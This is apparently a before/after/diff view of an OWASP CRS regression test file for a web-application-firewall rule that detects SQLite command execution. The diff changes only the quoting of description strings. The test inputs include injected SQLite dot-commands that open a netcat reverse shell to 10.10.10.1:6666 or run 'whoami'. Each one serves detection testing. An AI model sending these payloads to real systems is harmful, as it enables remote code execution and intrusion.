tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml (before)
---
meta:
  author: "flo405, Franziska Bühler, azurit"
  description: SQLite System Command Execution
rule_id: 932210
tests:
  - test_id: 1
    desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 2
    desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 3
    desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 4
    desc: ";\n.databases"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=;\\n.databases"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 5
    desc: "Fix N9FKP2XQ: .sh whoami"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get/juiceshop?s=1;.sh+whoami"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 6
    desc: "N9FKP2XQ"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: POST
          port: 80
          data: |
            code=1;.\"shell whoami
          uri: "/post"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932210]
  - test_id: 7
    desc: "N9FKP2XQ"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: POST
          port: 80
          data: |
            code=1;.\'shell whoami
          uri: "/post"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932210]

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml (after)
---
meta:
  author: "flo405, Franziska Bühler, azurit"
  description: SQLite System Command Execution
rule_id: 932210
tests:
  - test_id: 1
    desc: ';\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 2
    desc: '%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 3
    desc: ';\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 4
    desc: ';\n.databases'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=;\\n.databases"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 5
    desc: "Fix N9FKP2XQ: .sh whoami"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get/juiceshop?s=1;.sh+whoami"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [932210]
  - test_id: 6
    desc: "N9FKP2XQ"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: POST
          port: 80
          data: |
            code=1;.\"shell whoami
          uri: "/post"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932210]
  - test_id: 7
    desc: "N9FKP2XQ"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Host: localhost
            User-Agent: "OWASP CRS test agent"
          method: POST
          port: 80
          data: |
            code=1;.\'shell whoami
          uri: "/post"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932210]

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml (diff)
@@ -5,7 +5,7 @@ meta:
 rule_id: 932210
 tests:
   - test_id: 1
-    desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
+    desc: ';\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n'
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -21,7 +21,7 @@ tests:
           log:
             expect_ids: [932210]
   - test_id: 2
-    desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
+    desc: '%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n'
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -37,7 +37,7 @@ tests:
           log:
             expect_ids: [932210]
   - test_id: 3
-    desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n"
+    desc: ';\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n'
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -53,7 +53,7 @@ tests:
           log:
             expect_ids: [932210]
   - test_id: 4
-    desc: ";\n.databases"
+    desc: ';\n.databases'
     stages:
       - input:
           dest_addr: 127.0.0.1
